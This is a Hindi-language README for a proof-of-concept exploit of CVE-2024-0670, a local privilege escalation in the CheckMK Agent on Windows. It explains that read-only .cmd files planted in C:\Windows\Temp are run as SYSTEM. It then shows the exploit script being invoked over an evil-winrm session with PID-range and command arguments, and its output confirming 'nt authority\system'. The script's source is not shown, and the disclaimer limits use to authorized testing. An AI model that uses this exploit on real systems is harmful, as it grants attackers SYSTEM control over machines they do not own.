
CVE-2024-0670 के लिए PoC
यह रिपॉज़िटरी CVE-2024-0670 भेद्यता के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) एक्सप्लॉइट प्रदान करती है, जो Windows सिस्टम पर CheckMK Agent को प्रभावित करती है। यह भेद्यता तब उत्पन्न होती है जब CheckMK Agent C:\Windows\Temp निर्देशिका में अस्थायी फ़ाइलें बनाता और निष्पादित करता है। एक हमलावर उस निर्देशिका में लेखन-सुरक्षा (write protection) के साथ दुर्भावनापूर्ण फ़ाइलें पहले से रखकर इस व्यवहार का दुरुपयोग कर सकता है। जब एजेंट कोई ऐसी अस्थायी फ़ाइल बनाने का प्रयास करता है जो पहले से रीड-ओनली के रूप में मौजूद है, तो वह उसे ओवरराइट करने में विफल रहता है लेकिन फिर भी मौजूदा फ़ाइल को SYSTEM विशेषाधिकारों के साथ निष्पादित कर देता है, जिससे विशेषाधिकार वृद्धि (privilege escalation) संभव हो जाती है।
परामर्श संदर्भ: SEC Consult - Checkmk Agent में लिखने योग्य फ़ाइलों के माध्यम से स्थानीय विशेषाधिकार वृद्धि
यह प्रोजेक्ट केवल शैक्षिक, अनुसंधान और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है।
इस कोड का उपयोग उन सिस्टमों पर न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है।
लेखक किसी भी क्षति या दुरुपयोग के लिए जिम्मेदार नहीं है।
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
[+] Searching for Check MK installer...
[+] Found: C:\Windows\Installer\1e6f2.msi
[+] Using command: whoami > C:\Windows\Temp\whoami.txt
[+] Preparing 18000 .cmd files...
[*] Progress: 0%
[*] Progress: 10%
[*] Progress: 20%
[*] Progress: 30%
[*] Progress: 40%
[*] Progress: 50%
[*] Progress: 60%
[*] Progress: 70%
[*] Progress: 80%
[*] Progress: 90%
[*] Progress: 100%
[+] Triggering MSI to execute command...
[+] Done
evil-winrm-py PS C:\Users\magicrc\Desktop> cat C:\Windows\Temp\whoami.txt
nt authority\system